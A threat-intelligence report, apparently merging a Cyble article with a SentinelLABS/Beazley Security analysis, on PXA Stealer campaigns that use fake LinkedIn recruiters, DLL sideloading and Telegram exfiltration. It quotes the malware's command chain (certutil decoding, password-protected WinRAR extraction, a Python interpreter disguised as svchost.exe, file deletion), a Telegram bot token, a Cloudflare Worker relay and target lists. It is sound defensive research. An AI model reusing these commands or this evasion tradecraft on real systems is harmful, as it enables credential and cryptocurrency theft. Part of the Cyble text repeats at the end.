A newly exposed global malware campaign reveals how PXA Stealer has been wielded by Vietnam‑linked actors to siphon sensitive data from professionals across multiple countries using trusted platforms like LinkedIn. First documented in late 2024, this campaign has evolved into a new threat that leverages social engineering, advanced payload delivery, and stealthy execution to outmaneuver traditional defenses. Cybersecurity researchers at Cyble have mapped the multi‑stage attack chain, attributing the PXA Stealer campaign with a high degree of confidence to cybercriminals operating from Vietnam. These Vietnam‑linked actors target job seekers and professionals in India, Bangladesh, Sweden, the Netherlands, and the United States, exploiting trust in professional outreach to propagate their malware at scale.
Fake Recruiter Messages Feed the PXA Stealer Infection Chain
The campaign typically begins with a direct message on LinkedIn from a compromised or spoofed account posing as a recruiter from a fictitious company called Apex Logistics Group. The message promises remote work opportunities in fields like digital marketing and invites targets to engage, a tactic that lowers suspicion due to the context of career networking.
[caption id="" align="alignnone" width="1024"] Account compromises linked to the Apex Logistics Group (Source: Cyble)[/caption]
Once interest is established, victims are asked to complete a Google Form and then redirected through a URL shortener to a Zip archive hosted on cloud storage. That file, labeled with a job‑related name, contains a seemingly legitimate Microsoft Word executable that initiates a DLL sideloading sequence once launched. This technique allows the malicious DLL payload to load under the guise of a trusted binary.
[caption id="" align="alignnone" width="1024"] Google Form with hyperlink (Source: Cyble)[/caption]
To bypass detection, threat actors inflate the size of the malicious DLL to roughly 100 MB, far larger than its legitimate counterpart. A form of binary padding designed to slip past scanners that skip oversized files. The final payload, PXA Stealer, then executes solely in memory, leaving minimal traces on disk and greatly impeding forensic analysis.
Data Exfiltration and Persistence
Once active on a victim machine, PXA Stealer focuses on harvesting a wide range of sensitive materials. This includes:
Stored browser login credentials, cookies, and session tokens
Cryptocurrency wallet identifiers and associated applications
Two‑factor authentication secrets from authenticator apps
Desktop and email client credentials
Persistence is established through scheduled tasks disguised as standard system updates, such as a bogus Microsoft Edge update, blending malicious activity into normal operations. Exfiltration of stolen data is facilitated through encrypted Telegram channels and hidden command‑and‑control infrastructure that can masquerade as legitimate services to avoid detection.
A New Kind of Threat
Technical analysis of the PXA Stealer campaign shows a steady increase in technical activities since cybersecurity researchers first documented the strain in November 2024. Originally a Python‑based infostealer, the malware has since developed multi‑layer obfuscation, memory‑only execution, and dynamic command infrastructure retrieval via Telegram, traits which complicate detection and mitigation.
[caption id="" align="alignnone" width="1024"] PXA Stealer Malware profile (Source: Cyble)[/caption]
Through 2025, researchers observed expanded sideloading vehicles, enhanced obfuscation layers, and broader geographic targeting. By late 2025 and into early 2026, the attackers diversified the social engineering lures beyond job offers to include invitations to view tax forms, legal documents, and software installers. These hooks are designed to increase the likelihood of user interaction, particularly among the professionals most likely to be active on LinkedIn.
Global Scale and Consequences
Investigations by multiple cybersecurity groups indicate that PXA Stealer has already impacted tens of thousands of devices worldwide, with estimates of over 94,000 infected systems spanning Europe, Asia, and the Americas. The theft of credentials, including hundreds of thousands of unique passwords and millions of browser cookies, has enabled criminal actors to bypass multi‑factor authentication and escalate unauthorized access quickly.Victims range from individual job seekers to organizations in heavily regulated sectors. Companies face not only immediate compromise of systems and accounts but also longer‑term risks, including Business Email Compromise, regulatory breaches under frameworks like GDPR, and reputational harm if employee or customer data is misused.The PXA Stealer campaign shows how Vietnam‑linked actors exploit LinkedIn and fake recruiters like Apex Logistics Group to steal credentials, crypto wallets, and sensitive data. Organizations need vigilant defenses, including employee training, endpoint protection, MFA, and monitoring for unusual activity. Cyble offers AI-powered threat intelligence that predicts, detects, and neutralizes such attacks in real time. Schedule a demo to see how Cyble protects against threats like PXA Stealer.
SentinelLABS and Beazley Security discovered and analyzed a rapidly evolving series of infostealer campaigns delivering the Python-based PXA Stealer.
This discovery showcases a leap in tradecraft, incorporating more nuanced anti-analysis techniques, non-malicious decoy content, and a hardened command-and-control pipeline that frustrates triage and attempts to delay detection.
We identified more than 4,000 unique victim IP addresses in exfiltrated logs, with infected systems spanning at least 62 countries, most notably South Korea, the United States, the Netherlands, Hungary, and Austria.
The stolen data includes over 200,000 unique passwords, hundreds of credit card records, and more than 4 million harvested browser cookies, giving actors ample access to victims’ accounts and financial lives.
The threat actors behind these campaigns are linked to Vietnamese-speaking cybercriminal circles who monetize the stolen data through a subscription-based underground ecosystem that efficiently automates resale and reuse through the Telegram platform’s API.
Overview
In close partnership, Beazley Security and SentinelLABS have uncovered a large-scale, ongoing infostealer campaign built around the Python-based PXA Stealer. Initially surfacing in late 2024, this threat has since matured into a highly evasive, multi-stage operation driven by Vietnamese-speaking actors with apparent ties to an organized cybercriminal Telegram-based marketplace that sells stolen victim data.
Throughout 2025, these actors have continuously refined their delivery mechanisms and evasion strategies. Most notably, they’ve adopted novel sideloading techniques involving legitimate signed software (such as Haihaisoft PDF Reader and Microsoft Word 2013), concealed malicious DLLs, and embedded archives disguised as common file types. These campaigns use elaborate staging layers that obscure their purpose and delay detection by endpoint tools and human analysts alike.
The final payload, PXA Stealer, exfiltrates a broad spectrum of high-value data–which includes passwords, browser autofill data, cryptocurrency wallet and FinTech app data, and more–to Telegram channels via automated bot networks. Our telemetry and analysis uncovered over 4,000 unique victims across more than 60 countries, suggesting a widespread and financially motivated operation that feeds into criminal platforms such as Sherlock. This data is then monetized and sold to downstream cybercriminals, enabling actors who engage in cryptocurrency theft or buy access to infiltrate organizations for other purposes.
This campaign exemplifies a growing trend in which legitimate infrastructure (e.g., Telegram, Cloudflare Workers, Dropbox) is weaponized at scale to both execute and monetize information theft, while simultaneously reducing the cost and technical overhead for attackers. As stealer campaigns become increasingly automated and supply-chain integrated, defenders must adjust to an adversary landscape defined not just by malware, but by infrastructure, automation, and real-time monetization.
SentinelLABS would like to extend sincere thanks to our partners at Beazley Security for their instrumental collaboration and openness in sharing critical insights throughout this investigation.
Background and Haihaisoft Sideloading
This cluster of PXA Stealer activity has been ongoing and active since late 2024, with some BotIDs being created as early as October, 2024. The general delivery mechanisms and TTPs have not changed. However the actors behind this cluster have continually pivoted to new sideloading mechanisms, along with updated Telegram C2 infrastructure.
During a wave of attacks occurring in April 2025, users were phished or otherwise lured into downloading a compressed archive containing a signed copy of the Haihaisoft PDF Reader freeware application along with the malicious DLL to be sideloaded. This component of the attack is responsible for establishing persistence on the target host via the Windows Registry, and retrieving additional malicious components, including Windows executable payloads hosted remotely on Dropbox. Various infostealers were delivered in this initial campaign, including LummaC2 and Rhadamanthys Stealer.
It was during the first wave that we also observed a change in TTPs: the threat actors shifted to updated Python-based payloads instead of Windows executables.
Attacks leveraging the updated Python-based payloads are initiated in the same manner: delivery of a large archive containing the signed copy of Haihaisoft PDF Reader, alongside the malicious DLL to be loaded.
Upon execution, the malicious DLL creates a .CMD script Evidence.cmd in the current directory, which orchestrates all subsequent steps in the attack chain. The .CMD script utilizes certutil to extract an encrypted RAR archive embedded inside a malformed PDF.
This command leads the Edge browser to open the PDF file, though this results in an error message as the file is not a valid PDF. Subsequently, the packaged WinRAR utility–masquerading as images.png–extracts an embedded RAR archive using decoded command lines. This process took several minutes and caused sandbox analysis to time out in several cases, which led to false negative results.
images.png x -pS8SKXaOudHX78CnCmjawuXJAXwNAzVeK -inul -y LX8bzeZTzF5XSONpDC.rar C:\Users\Public\LX8bzeZTzF5XSONpDC
This extracts several Python dependencies, including a legitimate Python 3.10 interpreter renamed svchost.exe and a malicious Python script named Photos, which are then executed. This step sets a Registry Run key to ensure the payload will run each time the computer starts.
In July 2025, our partners at Beazley Security’s MDR shared initial indications of a new campaign closely mirroring the infection chain and TTPs we’d observed. This iteration notably improves their operational maturity and additional functionality.
The large archive attached to the phishing lure contained:
A legitimate, signed Microsoft Word 2013 executable
A malicious DLL, msvcr100.dll, that is sideloaded by the Microsoft Word 2013 executable
Additional files and later-stage payloads within a supporting directory named “_”.
While similar to the April campaign, the July wave introduces more sophisticated file naming to increase evasion and leverages non-malicious decoy documents opened to ensure the user remains unsuspecting.
The Microsoft Word 2013 binary is renamed to appear to the user as a Word document:
Screenshot of renamed Word 2013 executable to lure the user
The other files extracted from the archive are hidden from the user in Windows Explorer but shown below:
Extracted contents of the archive, including hidden files
When the victim opens the Word executable, Windows loads the malicious msvcr100.dll since the OS searches for the filename in the local directory before system directories. The sideloaded DLL then launches a hidden instance of Command Prompt and begins a multi-stage chain of activity:
First, Word launches a benign decoy document named Tax-Invoice-EV.docx, which displays a fake copyright infringement notice to the victim. We believe this document doubles as an anti-analysis feature by introducing a non-malicious file into the attack chain, which potentially wastes security analysts’ time. The document lacks macros or other scriptable objects.
Screenshot of the non-malicious decoy document
Next, like the previous activity, certutil is used to decode a file from the “-“ folder into a new encrypted zip archive that is deceptively named with a PDF file extension, Document.pdf for example:
certutil -decode Document.pdf Invoice.pdf
Then, a legitimate WinRar executable also hosted in the “-“ folder renamed images.png is used to unpack the archive:
images.png x -ibck -y -poX3ff7b6Bfi76keXy3xmSWnX0uqsFYur Invoice.pdf C:\\Users\\Public
The second archive contains a portable Windows Python interpreter, several Python libraries, and a malicious Python script. The Python interpreter is renamed to svchost.exe and launches a heavily obfuscated Python script again disguised as images.png, followed by the $BOT_ID argument.
The final payload is an updated version of PXA Stealer. PXA Stealer is a Python-based infostealer which first emerged in 2024. PXA is primarily seen in Vietnamese-speaking threat actor circles. The malware targets sensitive information including credentials, financial data, browser data and cookies, and cryptocurrency wallet details. As detailed below, a wide variety of applications and data types within these categories are supported by PXA Stealer. PXA Stealer is capable of exfiltrating data via Telegram, as has been observed in prior campaigns.
Similar to prior campaigns, the newly observed PXA Stealer payloads are capable of identifying, packaging, and exfiltrating data from an extensive list of applications and interfaces on infected systems. Exfiltration continues to be handled via Telegram, with specific Telegram BOT IDs and Tokens identified as tied to these more recent campaigns.
The new variant of PXA Stealer will enumerate Chromium/Gecko browsers, decrypt any saved passwords, cookies, stored personally identifiable information (PII), autofill data, and any authentication tokens. The infostealer will also attempt to inject a DLL into running instances of browsers such as Chrome, targeting Chrome’s App-Bound Encryption Key to defeat the internal encryption schemes within Chrome. The DLL injected during the July campaign targets MSEdge, Chrome, Whale, and CocCoc browsers.
Browsers targeted by the injected DLL from the July campaign
The infostealer also grabs files from dozens of desktop cryptocurrency wallets, VPN clients, Cloud-CLI utilities, connected fileshares, as well as applications such as Discord, and much more.
The collected data is packaged into ZIP archives then exfiltrated to a specific Telegram bot via Cloudflare Worker relays. There are also conditions where the malware will reach out to external sources for additional Python payloads, such as 0x0[.]st, a Pastebin-like temporary file hosting resource. Other analyzed PXA Stealer payloads support stealing data from the following browsers:
360Browser
Chromium
Opera Crypto
360 Extreme Browser
CocCoc
Opera GX
Aloha
CryptoTab
QQBrowser
Amigo
Dragon
Sidekick
Arc
Edge
Slimjet
Avast
Epic
Sogou
AVG
Ghost
Speed360
Brave
Iridium
SRWare
Brave Nightly
Liebao
Thorium
CCleaner
Liebao AI
UR Browser
Cent
Maxthon
Vivaldi
Chedot
Naver
Wavebox
Chrome
Opera
Yandex
The malware targets the following list of cryptocurrency wallet related browser extensions:
Ambire
ExodusWeb3
SafePal Wallet
Aptos Wallet
Frame
Station Wallet
Argent X
Keystone Wallet
Sui Wallet
Atomic Wallet
Leather Bitcoin Wallet
Talisman Wallet
Backpack Wallet
Ledger Live
Tonkeeper Wallet
Bitapp
Leo Wallet
TON Wallet
Bitget Wallet
Magic Eden Wallet
Uniswap Wallet
Bitski Wallet
MathWallet
Wallet Guard
Cosmostation Wallet
MyTonWallet
Zeal
Crocobit
OpenMask Wallet
Zeeve Wallet
Crypto.com
Portal DEX Wallet
Zerion
Edge Wallet
Pulse Wallet Chromium
Equal
Quai Wallet
User databases and configuration files for the following applications are targeted, many of which house sensitive data or cryptocurrency assets:
Armory
Dogecoin
Ledger Live
Atomic
Electron Cash
Litecoinwallets
Azure
Electrum
Monero
Binance
ElectrumLTC
Multidoge
Bitcoin Core
Ethereum
MyMonero
Blockstream Green
Exodus
OpenVPN
bytecoin
FileZilla
ProtonVPN
Chia Wallet
Guarda Desktop
Raven Core
Coinomi
Jaxx Desktop
Telegram
Daedalus Mainnet
KeePass
Wasabi Wallet
DashCorewallets
Komodo Wallet
Zcash
The infostealer is also capable of targeting website-specific data. The malware includes the following list of sites, for which the stealer will attempt to discover and collect credentials, cookies and session tokens. The targeted sites are primarily financial, such as FinTech services or cryptocurrency exchanges:
ads.google.com
coinomi.co.nl
korbit.co.kr
adsmanager.facebook.com
coinone.co.kr
kraken.com
binance.com
coinplug.ng
kucoin.com
bingx.com
crypto.com
lbank.com
bitfinex.com
electrum.org
mexc.com
bitget.com
exodus.com
nami.exchange
bitgo.com
gate.com
okx.com
bitmart.com
gemini.com
paypal.com
bitunix.com
gopax.co.kr
probit.com
business.facebook.com
htx.com
upbit.com
bybit.com
huobi.com
whitebit.com
coinbase.com
hyperliquid.xyz
xt.com
The specific Telegram Bot Token, and associated Chat ID, identified in the samples from July are:
Data is exfiltrated to Telegram via connection via Cloudflare workers. The specific Cloudflare DNS address is:
Lp2tpju9yrz2fklj.lone-none-1807.workers[.]dev
We reported this abuse of Cloudflare Workers to Cloudflare, and we thank their team for taking immediate action to disrupt this malicious infrastructure.
Each of the final PXA Stealer payloads corresponds to a Telegram Bot Token and ChatID combination. Each variant we analyzed is associated with the same Telegram Bot Token (7414494371:AAHsrQDkPrEVyz9z0RoiRS5fJKI-ihKJpzQ) although the ChatIDs vary. Additionally, there can be multiple ChatIDs, which correspond to a Telegram channel, tied to each payload. Each bot is tied to as many as 3 Telegram channels. One channel, typically denoted with the New Logs string, receives exfiltrated data contained in zip archives uploaded from victims’ machines, along with log/ledger style data for each victims’ exfiltrated data set. Specific entries also indicate the victim’s geographic location, IP address and other contextual data.
PXA Stealer log entries show counts for the types of data within: CK:2868|PW:482|AF:606|CC:0|FB:1|Sites:4|Wallets:0|Apps:1
The stealer data types include:
CK = Cookies
PW = Passwords
AF = AutoFill data
CC = Credit Card data
FB = Facebook Cookies
TK = Authentication Tokens
Sites = Domains / Site specific data
Wallets = Crypto Wallet data
Apps = Application specific data (ex: private messenger chat history and keys)
Exfiltrated Victim Data from MRB_NEW_VER_BOT via PXA Stealer
Each bot will also have an associated ‘Reset’ and ‘Notifications’ channel as well. The ‘Notification’ channels appear to allow operators to automate their communications process when new victim logs are uploaded or otherwise obtained. The ‘Reset’ channels appear to be used in similar manner to the ‘New Logs’ channels, storing newly exfiltrated victim data.
While all analyzed variants share the same Bot Token ID, we have observed multiple ChatIDs across the New Log/Reset/Notification combinations across this stealer’s ecosystem. The observed Bots-to-ID sets include:
The firstname field on this bot decodes to a string of Cyrillic text “ВИДЕО С ЛАЙКА”. This roughly translates to ‘Video for/with/of Laika,” though the significance of this string is unclear.
Telegram Abuse and Attribution
The later-stage dropper component is responsible for parsing target Telegram URLs based on a string gathered from a prescribed Telegram ChatID. This string is then combined with the base URL for either paste[.]rs or 0x0[.]st to retrieve the next batch of obfuscated Python code.
Multiple identifiers were observed across the multitude of analyzed samples. The most prominent we observed are:
ADN_2_NEW_VER_BOT
DA_NEW_VER_BOT
JAMES_NEW_VER_BOT
JND_NEW_VER_BOT
MR_P_NEW_VER_BOT
MR_Q_NEW_VER_BOT
KBL_NEW_VER_BOT
MRB_NEW_VER_BOT
These identifiers are visible within the commands launched by the side-loaded DLL described above.
cmd /c cd _ && start Tax-Invoice-EV.docx && certutil -decode Document.pdf Invoice.pdf && images.png x -ibck -y -poX3ff7b6Bfi76keXy3xmSWnX0uqsFYur Invoice.pdf C:\\Users\\Public && start C:\\Users\\Public\\Windows\\svchost.exe C:\\Users\\Public\\Windows\\Lib\\images.png MR_Q_NEW_VER_BOT && del /s /q Document.pdf && del /s /q Invoice.pdf && exit && exit)
Each of these _NEW_VER_BOT identifiers corresponds to a Telegram User ID. The profile names resemble a bot, but are actually user accounts:
Bio and Info fields from Telegram profiles masquerading as bots
When retrieving files from paste[.]rs, the corresponding strings are concatenated with the hxxps://paste[.]rs or hxxps://0x0[.]st prefix, which constructs the full download URL hosting another payload.
Obfuscated Python code hosted on Paste[.]rsOnce downloaded, the obfuscated Python code is decoded and executed, delivering the Infostealer component of the attack.
The Telegram ChatID associated with the infostealer component of this attack is “@Lonenone.” The “Lonenone” theme is also present in the Cloudflare Worker hostname lp2tpju9yrz2fklj[.]lone-none-1807[.]workers[.]dev. The profile display name contains an emoji of the Vietnam flag.
Lone None Telegram ChatIDReference to LoneNone TG channel in decoded (July) infostealer
This Telegram ChatID/Account is associated with the same threat actor using PXA Stealer as previously described by Cisco Talos. It is worth noting that there are a number of other Vietnamese-language artifacts present in these stages of the malware. For example, the aforementioned Telegram BOT IDs show ‘Duc Anh’…aka “đức anh” as display names, which loosely translates to “brother”.
PXA Stealer uses the BotIDs (stored as TOKEN_BOT) to establish the link between the main bot and the various ChatID (stored as CHAT_ID). The ChatIDs are Telegram channels with various properties, but they primarily serve to host exfiltrated data and provide updates and notifications to the operators.
PXA Stealer transmits data via HTTP POST requests to the Telegram API. Everything is handled via HTTPS, thus there is no visible Telegram process or self-contained client producing the traffic. This is one of PXA stealer’s methods of hiding exfiltration traffic from potential analysis or detection.
Prior to transferring the exfiltrated data, the stealer packages stage data into an archive using the following naming convention where CC=Country Code:
Probiv[.]gg contains a redirect to the Sherlock Telegram Bot Service, which provides a search interface for data culled from infostealers.
Telegram redirect on probiv[.]ggThe redirect leads to the Telegram landing page for SherLock1u_BOT, a provider of stolen data, and the automated services to search for specific data types or sets.
SherLock1u_BOT
We also tracked activity from the bots since April indicating targeting of victims in South Korea. The following image shows details of exfiltrated data from one Korea-based victim by the MRB_NEW_VER_BOT ID.
South Korea victim data uploaded to Telegram via PXA Stealer
Victimology
Our analysis uncovered details around victimology for several active BotIDs associated with the ongoing PXA Stealer campaign. Some of these Bots have been active since at least October 2024, and they continue to receive data from infected hosts to date.
Adonis (ADN_2_NEW_BOT) victim records
The PXA Stealer logs contain victim IP addresses that indicate there are potentially more than 4,000 unique victims from 62 countries. The top targeted countries in the analyzed set are:
Republic of Korea (KR)
United States (US)
Netherlands (NL)
Hungary (HU)
Austria (AT)
Some appear to favor specific locations, for example Adonis (ADN_2_NEW_VER_BOT) most heavily targets hosts in Israel and Taiwan, followed by South Korea and the United States.
Conclusion
The evolving tradecraft in these recent campaigns demonstrates that these adversaries have meticulously refined their deployment chains, making them increasingly more challenging to detect and analyze. The July 2025 attack chain in particular illustrates a highly tailored approach engineered to bypass traditional antivirus solutions, delay execution in sandboxes, and mislead SOC analysts who review process trees or EDR data by using byzantine delivery and installation methods.
This campaign’s medley of legitimate applications and non-malicious decoy documents is designed to mislead users and SOC analysts alike. The actors reinforce this facade by naming a user-space folder to mimic the system directory Windows and disguising a Python interpreter as svchost.exe to blend into typical system activity. In parallel, they use files with familiar extensions, such as PNG and PDF, to conceal embedded WinRAR executables and ZIP archives, layering their evasion techniques to mislead users, investigators, and traditional detection technologies.
PXA Stealer, and the threat actors behind it, continue to feed the greater infostealer ecosystem. It is also important to note that PXA, along with similar stealers like Redline, Lumma, and Vidar, each produce data that can be neatly ingested into data monetization ecosystems. The sales-oriented services like Sherlock, such as Daisy Cloud and Moon Cloud, take data harvested by these stealers directly from the bots. The more mature services then normalize the sets of exfilterated data to make it ‘sales-ready’. The idea behind leveraging the legitimate Telegram infrastructure is driven by the desire to automate exfiltration and streamline the sales process, which enables actors to deliver data more efficiently to downstream criminals. The developer-friendly nature of Telegram–combined with the company’s laissez-faire attitude towards cybercrime–underscores the crucial role that Telegram plays in the holistic cybercriminal ecosystem.
Entrar
Account compromises linked to the Apex Logistics Group (Source: Cyble)[/caption]
Once interest is established, victims are asked to complete a Google Form and then redirected through a URL shortener to a Zip archive hosted on cloud storage. That file, labeled with a job‑related name, contains a seemingly legitimate Microsoft Word executable that initiates a DLL sideloading sequence once launched. This technique allows the malicious DLL payload to load under the guise of a trusted binary.
[caption id="" align="alignnone" width="1024"]
Google Form with hyperlink (Source: Cyble)[/caption]
To bypass detection, threat actors inflate the size of the malicious DLL to roughly 100 MB, far larger than its legitimate counterpart. A form of binary padding designed to slip past scanners that skip oversized files. The final payload, PXA Stealer, then executes solely in memory, leaving minimal traces on disk and greatly impeding forensic analysis.
PXA Stealer Malware profile (Source: Cyble)[/caption]
Through 2025, researchers observed expanded sideloading vehicles, enhanced obfuscation layers, and broader geographic targeting. By late 2025 and into early 2026, the attackers diversified the social engineering lures beyond job offers to include invitations to view tax forms, legal documents, and software installers. These hooks are designed to increase the likelihood of user interaction, particularly among the professionals most likely to be active on LinkedIn.
